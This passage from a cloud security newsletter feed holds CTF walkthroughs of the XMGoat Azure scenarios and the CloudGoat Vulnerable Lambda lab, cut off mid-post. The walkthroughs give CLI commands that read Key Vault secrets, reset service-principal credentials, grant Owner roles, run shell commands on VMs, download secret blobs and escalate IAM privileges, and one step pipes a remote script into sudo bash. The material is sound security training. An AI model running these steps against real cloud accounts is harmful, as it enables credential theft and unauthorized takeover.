class="codeblock"><pre><code>az keyvault list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/186d1f64-38fd-4500-9eb8-8913bee96b7b/image-10.png?t=1731253164"/></div><p class="paragraph" style="text-align:left;">Let’s fetch all secrets from the key vault <code>batcave</code>.</p><div class="codeblock"><pre><code>az keyvault secret list --vault-name batcave</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/041b0275-2cd1-436f-be6d-2f8479996f7e/image-11.png?t=1731253233"/></div><p class="paragraph" style="text-align:left;">In the <code>id</code> section, we can see the secret named <code>butler</code>. We then pass this on to reveal the secret.</p><div class="codeblock"><pre><code>az keyvault secret show --vault-name batcave --name butler</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/af7c2af6-c71f-4b41-b79c-623720c76ecf/image-12.png?t=1731253190"/></div><p class="paragraph" style="text-align:left;">We have found the credentials of a possible regular user account.</p><p class="paragraph" style="text-align:left;">Regular user accounts are linked to individual identities and include wider access authorizations suitable for different positions within a company.</p><p class="paragraph" style="text-align:left;">Let’s see if this user credential works.</p><div class="codeblock"><pre><code>az login -u &lt;username&gt; -p &lt;password&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/806b86ac-a06f-4f36-82b1-520dc274a801/image-13.png?t=1731253286"/></div><p class="paragraph" style="text-align:left;">It worked.</p><p class="paragraph" style="text-align:left;">Going by the hint that “No Administering Resource Locks,” let’s see if this compromised user can edit the Key Vault’s access policy and update its privileges.</p><p class="paragraph" style="text-align:left;">Let’s try making our compromised user <code>butler</code> the owner of the key vault <code>batcave</code>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6305f60c-83b8-4dc2-81d4-936437f99a5d/image-14.png?t=1731253308"/></div><p class="paragraph" style="text-align:left;">Executing the command without scope gives us an error.</p><p class="paragraph" style="text-align:left;">Now, we assign the scope at the subscription level, which gives us elevated privileges at the specified level or scope.</p><div class="codeblock"><pre><code>az role assignment create --assignee &lt;assignee username&gt; --role &lt;role&gt; --scope &lt;scope define&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/acae65e5-8d04-41f3-ab8c-98e008441caf/image-15.png?t=1731253339"/></div><p class="paragraph" style="text-align:left;">To verify our elevated permissions, use the command below to list all role assignments for a specific user or service principal.</p><div class="codeblock"><pre><code>az role assignment list --all --assignee</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/956a9bf4-ffad-4708-b1d6-e5b598570446/image-16.png?t=1731253367"/></div><p class="paragraph" style="text-align:left;">We can see <code>roledefinitionName</code> is set to <b>Owner</b>, which means we have successfully elevated our privileges.</p><h1 class="heading" style="text-align:left;" id="conclusion">Conclusion</h1><p class="paragraph" style="text-align:left;">In conclusion, Scenario 2 of XMGoat shows how an attacker can use the leaked credentials of a Service Principal to enumerate secrets stored in the Key Vault. These secrets, which included the credentials of a regular account, were used to update the access policies of the Key Vault and escalate privileges to become the Owner of the Key Vault.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/148f3e0e-af8b-4d6e-a0c2-27f1eb3a453d/image-17.png?t=1731253399"/><div class="image__source"><span class="image__source_text"><p>Source: <a class="link" href="https://github.com/XMCyber/XMGoat/tree/main/scenarios/scenario_2?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-2" target="_blank" rel="noopener noreferrer nofollow">https://github.com/XMCyber/XMGoat/tree/main/scenarios/scenario_2</a></p></span></div></div></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=5d753052-f7a4-4308-a448-c1459eebdb4e&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving XMGoat – Scenario 1</title>
  <description>Discover how to exploit Azure misconfigurations in XMGoat&#39;s Scenario 1, pivoting from VM to compromising a sensitive storage account.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/90422786-dce5-40c6-8a6f-697108bb897c/XMGoat_Scenario_1_Cover.jpg" length="33063" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-xmgoat-scenario-1</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-xmgoat-scenario-1</guid>
  <pubDate>Sat, 29 Jun 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-06-29T18:30:00Z</atom:published>
    <dc:creator>Harshwardhan Solanki</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Azure]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><h1 class="heading" style="text-align:left;" id="introduction">Introduction</h1><p class="paragraph" style="text-align:left;">Azure, Microsoft’s cloud computing platform, offers a wide range of services that businesses worldwide use. However, as with any platform, ensuring the security of your Azure environment is crucial. This blog post will guide you through the process of penetration testing an Azure environment, specifically focusing on the <a class="link" href="https://github.com/XMCyber/XMGoat?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-1" target="_blank" rel="noopener noreferrer nofollow">XMGoat</a> vulnerable environment <a class="link" href="https://github.com/XMCyber/XMGoat/tree/main/scenarios/scenario_1?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-1" target="_blank" rel="noopener noreferrer nofollow">scenario one</a>. We will highlight key areas to focus on and provide step-by-step instructions to help you understand and test the security of your Azure setup.</p><h1 class="heading" style="text-align:left;" id="scenario-1">Scenario 1</h1><p class="paragraph" style="text-align:left;">URL: <a class="link" href="https://github.com/XMCyber/XMGoat/tree/main/scenarios/scenario_1/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-1" target="_blank" rel="noopener noreferrer nofollow">https://github.com/XMCyber/XMGoat/tree/main/scenarios/scenario_1/</a></p><p class="paragraph" style="text-align:left;">This scenario revolves around:</p><ul><li><p class="paragraph" style="text-align:left;">Resource Groups</p></li><li><p class="paragraph" style="text-align:left;">Virtual Machines</p></li><li><p class="paragraph" style="text-align:left;">Storage Accounts</p></li><li><p class="paragraph" style="text-align:left;">Azure AD Applications</p></li></ul><p class="paragraph" style="text-align:left;">To deploy the scenario first we need to login to Azure Account using Azure CLI</p><div class="codeblock"><pre><code>az login
cd scenarios/scenario_1
terraform init
terraform plan -out &lt;filename&gt;
terraform apply &lt;filename&gt;</code></pre></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><span style="background-color:rgba(0, 0, 0, 0);"><b>Note</b></span><b>:</b> You need to create a different Resource Group to use with this scenario; you can do it with Azure portal or az cli <code>az group create --name &lt;name&gt; --location &lt;loc&gt;</code>.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><span style="background-color:rgba(0, 0, 0, 0);"><b>Remember</b></span><b>:</b> You should have a unique name for your storage account and use strong passwords for the VMs.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">This is how our resources look once deployed:</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/905232ef-71f0-4484-95db-13c138099d99/image-1.png?t=1731250133"/></div><h1 class="heading" style="text-align:left;" id="getting-started">Getting Started</h1><p class="paragraph" style="text-align:left;">First plan and build the script</p><div class="codeblock"><pre><code>terraform plan -out Scenario1
terraform apply Scenario1</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/fa48a5f5-dd32-46b2-8b13-70fd3e516e73/image-2.png?t=1731250166"/></div><p class="paragraph" style="text-align:left;">To get access to the initial user and services, use <code>terraform output --json</code>. This will display the user, password, and services to get started with the challenge.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4fe07d0c-e432-4685-b793-611f169cbd3b/image-2-2.png?t=1731250321"/></div><p class="paragraph" style="text-align:left;">We’ll log in to the initial user.</p><div class="codeblock"><pre><code>az login -u bruce@cloudsecurity.club -p &lt;PASSWORD&gt; --allow-no-subscription</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/5c9d7bab-1069-4e61-bd58-e6fa5a50c05a/image-3.png?t=1731250386"/></div><p class="paragraph" style="text-align:left;">Let’s try to enumerate the user’s permissions</p><div class="codeblock"><pre><code>az ad group list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/baefade5-7271-4566-8a52-d56aa3f1d8d2/image-4.png?t=1731250410"/></div><div class="codeblock"><pre><code>az ad user show --id &quot;wayne@cloudsecurity.club&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/b8e75223-4901-47f4-b006-4b3a10b6c701/image-5.png?t=1731250432"/></div><p class="paragraph" style="text-align:left;">We don’t have enough permission to view the ad groups and ids, move on to check the apps deployed.</p><div class="codeblock"><pre><code>az ad app list --show-mine</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1c6903da-dd30-4083-9c34-4dad21c4eb22/image-6.png?t=1731250455"/></div><p class="paragraph" style="text-align:left;">There is no MFA, auth permissions and certifications set-up, we can see that in the 2nd and 3rd block itself. We can try to reset the credentials and get access to the service principal account.</p><div class="codeblock"><pre><code>az ad app credential reset --id &lt;APPID&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7739fcb5-6753-46d2-b51c-06f3ef44c5d1/image-7.png?t=1731250483"/></div><p class="paragraph" style="text-align:left;">Now that credentials are reset successfully, we can access to the principal account</p><div class="codeblock"><pre><code>az login --service-principal -u &lt;appid&gt; -p &lt;password&gt; -t &lt;tenant&gt; --allow-no-subscription</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8834c796-ff97-4f85-8460-e5e41ac11508/image-8.png?t=1731250516"/></div><p class="paragraph" style="text-align:left;">List the VMs running on the account</p><div class="codeblock"><pre><code>az vm list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/764c9813-8571-478f-902f-ff895038979f/image-9.jpg?t=1731250546"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/321dc71b-4f4a-4242-8a06-7947e2c53b0e/image-10.jpg?t=1731250562"/></div><p class="paragraph" style="text-align:left;">You will get a long output showing all the details about the VM and resource group. Install Azure CLI on the VM and run the command inside the VM. Installing the Azure CLI (Command-Line Interface) on a VM (Virtual Machine) running a Debian-based Linux distribution allows you to manage Azure resources directly from that VM. The Azure CLI provides a set of commands to manage Azure resources, such as creating and managing VMs, resource groups, and other services.</p><div class="codeblock"><pre><code>az vm run-command invoke --command-id RunShellScript --name batcomputer01 --resource-group Waynemanor --scripts &quot;curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/19a2499e-b105-4cd1-8d26-ae4bc2dada97/image-11.png?t=1731250587"/></div><p class="paragraph" style="text-align:left;">Once installed successfully, we can log into the VM using the user-assigned identity that we saw earlier when we listed the VMs list.</p><div class="codeblock"><pre><code>az vm run-command invoke --command-id RunShellScript --name batcomputer01 --resource-group Waynemanor --scripts &quot;az login --identity --username d332a127-5f8f-445f-a37d-fc09587f682c&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/74ee40d2-77c2-4390-9a8f-aa03079fd43d/image-12.png?t=1731250611"/></div><p class="paragraph" style="text-align:left;">Now list the storage accounts.</p><div class="codeblock"><pre><code>az vm run-command invoke --command-id RunShellScript --name batcomputer01 --resource-group Waynemanor --scripts &quot;az storage account list&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6927b04d-aea6-4e08-92d3-099c9893752d/image-13.png?t=1731250636"/></div><p class="paragraph" style="text-align:left;">In the output we can see <code>batcave01</code> is the storage account name. Now using this we can print out the containers in it.</p><div class="codeblock"><pre><code>az vm run-command invoke --command-id RunShellScript --name batcomputer01 --resource-group Waynemanor --scripts &quot;az storage container list --account-name batcave01 --auth-mode login&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/fe599c05-d1c7-426f-b68e-98346b6a80cc/image-14.png?t=1731250953"/></div><p class="paragraph" style="text-align:left;">Once logged in, we can see a blob named <code>cloudsecc01</code>. Now we just need to list out the contents inside it.</p><div class="codeblock"><pre><code>az vm run-command invoke --command-id RunShellScript --name batcomputer01 --resource-group Waynemanor --scripts &quot;az storage blob list -c cloudsecc01 --account-name batcave01 --auth-mode login&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4704a26d-b738-49c8-afc1-8f8d5cdf002f/image-15.png?t=1731250980"/></div><p class="paragraph" style="text-align:left;">We can see a file named <code>secret.txt</code> we download the file onto our Vm and then read the contents of the file.</p><div class="codeblock"><pre><code>az vm run-command invoke --command-id RunShellScript --name batcomputer01 --resource-group Waynemanor --scripts &quot;az storage blob download -n secret.txt -c cloudsecc01 --account-name batcave01 --auth-mode login -f /secret.txt&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c54fd103-4f50-4751-9133-ba684474042b/image-16.png?t=1731251004"/></div><p class="paragraph" style="text-align:left;">Now that it is downloaded into our VM we can read the contents easily.</p><div class="codeblock"><pre><code>az vm run-command invoke --command-id RunShellScript --name batcomputer01 --resource-group Waynemanor --scripts &quot;cat /secret.txt&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/bb391446-ce1f-4bea-aaf7-7d128a9cb3b9/image-17.png?t=1731250688"/></div><h1 class="heading" style="text-align:left;" id="conclusion">Conclusion</h1><p class="paragraph" style="text-align:left;">In conclusion, Scenario 1 of XMGoat shows how an attacker can use leaked credentials to execute commands inside VM and access blobs inside storage account.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/982a2668-5248-4065-9c9a-cef57bfc8a67/image-18.png?t=1731251063"/><div class="image__source"><span class="image__source_text"><p>Source: <a class="link" href="https://github.com/XMCyber/XMGoat/tree/main/scenarios/scenario_1?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-1" target="_blank" rel="noopener noreferrer nofollow">https://github.com/XMCyber/XMGoat/tree/main/scenarios/scenario_1</a></p></span></div></div></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=26af1993-a70a-49e3-a4f4-29d58622bffe&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>CloudGoat Vulnerable Lambda Walkthrough</title>
  <description>Comprehensive CloudGoat Vulnerable Lambda Walkthrough: Detailed step-by-step guide covering AWS misconfigurations and exploitation techniques</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/702b3314-478f-403a-8784-d063702e9462/CloudGoat_Vulnerable_Lambda_Cover.jpg" length="40576" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-cloudgoat-vulnerable-lambda</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-cloudgoat-vulnerable-lambda</guid>
  <pubDate>Tue, 25 Jun 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-06-25T18:30:00Z</atom:published>
    <dc:creator>Suraj Yadav</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Aws]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">In this <a class="link" href="https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/vulnerable_lambda?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=cloudgoat-vulnerable-lambda-walkthrough" target="_blank" rel="noopener noreferrer nofollow">CloudGoat Vulnerable Lambda</a> walkthrough, we will explore IAM privilege escalation by exploiting custom Lambda function logic and retrieving secrets from the AWS Secrets Manager.</p><p class="paragraph" style="text-align:left;">If you prefer watching this post as a YouTube video, here you go:</p><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="true" class="youtube_embed" frameborder="0" height="100%" src="https://youtube.com/embed/JwmJrtjS4nA" width="100%"></iframe><h1 class="heading" style="text-align:left;" id="challenge-description">Challenge Description</h1><p class="paragraph" style="text-align:left;">You start as the ‘bilbo’ user in this scenario. You will assume a role with more privileges, discover a lambda function that applies policies to users, and exploit a vulnerability in the function to escalate the privileges of the bilbo user to search for secrets.<br>Use <code>./cloudgoat.py create vulnerable_lambda</code> to create the scenario.<br>Link: <a class="link" href="https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/vulnerable_lambda?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=cloudgoat-vulnerable-lambda-walkthrough" target="_blank" rel="noopener noreferrer nofollow">https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/vulnerable_lambda</a></p><h1 class="heading" style="text-align:left;" id="scenario-goal">Scenario Goal</h1><p class="paragraph" style="text-align:left;">Find the scenario’s secret. (cg-secret-XXXXXX-XXXXXX)</p><h1 class="heading" style="text-align:left;" id="solution">Solution</h1><p class="paragraph" style="text-align:left;">After creating the scenario, IAM user bilbo’s credentials are stored in the <code>start.txt</code> file in the <code>vulnerable_lambda*</code> folder. Use these credentials to configure the profile for <code>bilbo</code>.</p><div class="codeblock"><pre><code>cat vulnerable_lambda_cgidr2hk6ccycu/start.txt; aws configure --profile bilbo</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/00a0cf66-c311-4ddf-ba7f-8a4d20c17444/cg-vuln-lambda-01.png?t=1731248600"/></div><p class="paragraph" style="text-align:left;">Let’s start by viewing the details of the IAM user ‘bilbo’ using <code>sts:GetCallerIdentity</code>.</p><div class="codeblock"><pre><code>aws --profile bilbo sts get-caller-identity</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d007fb1c-3598-47cd-9541-e20be454a98e/cg-vuln-lambda-02.png?t=1731248620"/></div><p class="paragraph" style="text-align:left;">Listing the IAM groups shows that the user ‘bilbo’ does not belong to any group.</p><div class="codeblock"><pre><code>aws --profile bilbo iam list-groups-for-user --user-name cg-bilbo-vulnerable_lambda_cgidr2hk6ccycu</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c134fa36-25e0-40f2-bcf8-38fdd9aa5f2a/cg-vuln-lambda-03.png?t=1731248635"/></div><p class="paragraph" style="text-align:left;">There are no managed policies are attached to the user as well.</p><div class="codeblock"><pre><code>aws --profile bilbo iam list-attached-user-policies --user-name cg-bilbo-vulnerable_lambda_cgidr2hk6ccycu</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/72ae7f1e-a30a-4efa-867e-f9635fdfa52e/cg-vuln-lambda-04.png?t=1731248663"/></div><p class="paragraph" style="text-align:left;">Finally, we find an inline policy attached.</p><div class="codeblock"><pre><code>aws --profile bilbo iam list-user-policies --user-name cg-bilbo-vulnerable_lambda_cgidr2hk6ccycu</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4ccde997-1d77-4751-a63f-cc30f55c8ac9/cg-vuln-lambda-05.png?t=1731248706"/></div><p class="paragraph" style="text-align:left;">Let’s retrieve the inline policy document using <code>iam:GetUserPolicy</code>.</p><div class="codeblock"><pre><code>aws --profile bilbo iam get-user-policy --user-name cg-bilbo-vulnerable_lambda_cgidr2hk6ccycu --policy-name cg-bilbo-vulnerable_lambda_cgidr2hk6ccycu-standard-user-assumer</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4d875d6e-d67e-4f73-935d-0140df4bd915/cg-vuln-lambda-06.png?t=1731248688"/></div><p class="paragraph" style="text-align:left;">The above policy document contains two policy statements that define the permissions for the user ‘bilbo’:</p><ul><li><p class="paragraph" style="text-align:left;">The user can assume any role with an ARN prefix matching <code>cg-lambda-invoker</code>.</p></li><li><p class="paragraph" style="text-align:left;">The user can perform <code>SimulatePrincipalPolicy</code>, <code>SimulateCustomPolicy</code>, and IAM actions that start with <code>Get</code> and <code>List</code>.</p></li></ul><p class="paragraph" style="text-align:left;">Try listing the roles to see if there is any role with the prefix “cg-lambda-invoker”.</p><div class="codeblock"><pre><code>aws --profile bilbo iam list-roles | grep &#39;cg-lambda-invoker&#39;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d2097985-6f0c-46cc-8e07-30d3da86fe4a/cg-vuln-lambda-07.png?t=1731248761"/></div><p class="paragraph" style="text-align:left;">Based on the policies permitting the user’s <code>sts:AssumeRole</code> action, attempt to assume the <code>cg-lambda-invoker</code> role.</p><div class="codeblock"><pre><code>aws --profile bilbo sts assume-role --role-arn RoleARN --role-session-name bilboSession</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d7b70624-9bd0-4962-beb5-afdba3ede9c9/cg-vuln-lambda-08.png?t=1731248804"/></div><p class="paragraph" style="text-align:left;">Assuming the role provides credentials that enable the user ‘bilbo’ to operate with the permissions defined by that role. Set these access keys and the session token to configure the profile <code>bilboSession</code>.</p><p class="paragraph" style="text-align:left;">Next, attempt to list the role policies for the assumed role.</p><div class="codeblock"><pre><code>aws --profile bilboSession iam list-role-policies --role-name cg-lambda-invoker-vulnerable_lambda_cgidr2hk6ccycu</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f74c7af1-6940-494e-bf9e-9afd9b86217d/cg-vuln-lambda-09.png?t=1731248788"/></div><p class="paragraph" style="text-align:left;">We see one inline policy <code>lambda-invoker</code> attached with the assumed role. Let’s attempt to retrieve the policy document for the listed policy.</p><div class="codeblock"><pre><code>aws --profile bilboSession iam get-role-policy --role-name cg-lambda-invoker-vulnerable_lambda_cgidr2hk6ccycu --policy-name lambda-invoker</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7f9e34e7-9800-419b-aa52-ec2f17e1191e/cg-vuln-lambda-10.png?t=1731248846"/></div><p class="paragraph" style="text-align:left;">The policy document also contains two policy statements:</p><ul><li><p class="paragraph" style="text-align:left;">The user assuming the role is permitted to perform five lambda actions: <code>list-function-event-invoke-configs</code>, <code>invoke-function</code>, <code>list-tags</code>, <code>get-function</code>, <code>get-policy</code> on the lambda function named <code>vulnerable_lambda_cgidr2hk6ccycu-policy_applier_lambda1</code>.</p></li><li><p class="paragraph" style="text-align:left;">It allows the user to assume the role of listing lambda functions, <code>iam:SimulateCustomPolicy</code>, <code>iam:SimulatePrincipalPolicy</code>, and IAM actions starting with <code>Get</code> and <code>List</code>.</p></li></ul><p class="paragraph" style="text-align:left;">Let’s list the Lambda functions accessible to the user as the assumed role grants permission for the <code>lambda:ListFunctions</code> action.</p><div class="codeblock"><pre><code>aws --profile bilboSession lambda list-functions</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c62d7988-951a-448d-ac95-c2003f2a66ad/cg-vuln-lambda-11.png?t=1731248869"/></div><p class="paragraph" style="text-align:left;">The description of this function indicates that it will apply a managed policy to the user of our choice. Retrieve the function using <code>lambda:GetFunction</code>.</p><div class="codeblock"><pre><code>aws --profile bilboSession lambda get-function --function-name vulnerable_lambda_cgidr2hk6ccycu-policy_applier_lambda1</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7a9d22fe-ca2f-412e-af87-4c7be1d2148e/cg-vuln-lambda-12.png?t=1731248897"/></div><p class="paragraph" style="text-align:left;">The <b>Location</b> field in the above output contains the URL to the deployment package of the lambda function. This URL leads to a zip file containing the source code, including dependencies, for the lambda. It also indicates the location of the handler function, which is the <code>main.handler</code>.</p><div class="codeblock"><pre><code>ls -l -g -o --color=auto vulnerable_lambda_cgidr2hk6ccycu-policy_applier_lambda1</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c19f37e9-96b5-4126-a3c1-6fcc33ddc9d7/cg-vuln-lambda-13.png?t=1731248927"/></div><p class="paragraph" style="text-align:left;">The file <code>main.py</code> contains the code to add managed policies to any IAM user passed in the JSON input.</p><div class="codeblock"><pre><code>cat vulnerable_lambda_cgidr2hk6ccycu-policy_applier_lambda1/main.py</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3485a00d-71ee-4e4f-b646-9c9443281423/cg-vuln-lambda-14.png?t=1731248961"/></div><p class="paragraph" style="text-align:left;">If you look carefully, the code parses the input to extract the policy names’ values and constructs a SQL query without sanitizing it, <b>making it vulnerable to SQL injection</b>.</p><p 